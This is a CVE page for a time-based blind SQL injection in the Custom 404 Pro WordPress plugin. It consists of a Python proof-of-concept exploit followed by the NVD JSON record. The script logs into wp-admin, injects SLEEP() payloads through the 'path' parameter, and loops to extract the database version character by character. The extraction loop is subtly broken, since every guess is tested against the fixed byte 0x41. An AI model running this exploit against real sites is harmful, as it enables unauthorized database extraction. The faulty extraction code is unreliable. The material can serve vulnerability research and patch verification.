CVE-2025-9947

# CVE-2025-9947 - Custom 404 Pro Time-based SQL Injection PoC # Vulnerability: Time-based Blind SQL Injection via 'path' parameter # Affected: Custom 404 Pro <= 3.12.0 # Requirement: Administrator-level access import requests import time # Target configuration TARGET_URL = "http://target-wordpress-site.com" ADMIN_USER = "admin" ADMIN_PASS = "password123" # Step 1: Login as administrator session = requests.Session() login_data = { "log": ADMIN_USER, "pwd": ADMIN_PASS, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Time-based SQL Injection payload via 'path' parameter # The payload uses SLEEP() to test if injection works # Normal response time vs delayed response indicates successful injection # Basic time-based injection test payload = "1' AND (SELECT SLEEP(5))-- -" injection_url = f"{TARGET_URL}/wp-admin/admin.php" params = { "page": "custom-404-pro", "path": payload } start_time = time.time() response = session.get(injection_url, params=params) elapsed_time = time.time() - start_time if elapsed_time >= 5: print(f"[+] SQL Injection confirmed! Response delayed by {elapsed_time:.2f} seconds") else: print(f"[-] No injection detected. Response time: {elapsed_time:.2f} seconds") # Step 3: Extract database version using conditional time-based injection # Example: Extract first character of database version def extract_data(query, position=1): payload = f"1' AND IF(SUBSTRING(({query}),{position},1)=BINARY 0x41,SLEEP(3),0)-- -" params["path"] = payload start = time.time() session.get(injection_url, params=params) return time.time() - start # Extract database version print("[*] Extracting database version...") version = "" for i in range(1, 20): found = False for c in range(32, 127): delay = extract_data("SELECT VERSION()", i) if delay >= 3: version += chr(c) print(f"[+] Found char at position {i}: {chr(c)}") found = True break if not found: break print(f"[+] Database version: {version}")

{"cve": {"id": "CVE-2025-9947", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:44.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Custom 404 Pro plugin for WordPress is vulnerable to time-based SQL Injection via the ‘path’ parameter in all versions up to, and including, 3.12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/custom-404-pro/tags/3.12.0/admin/Helpers.php#L188", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e289988c-8bc1-4b2a-87a2-c94758d10e88?source=cve", "source": "[email protected]"}]}}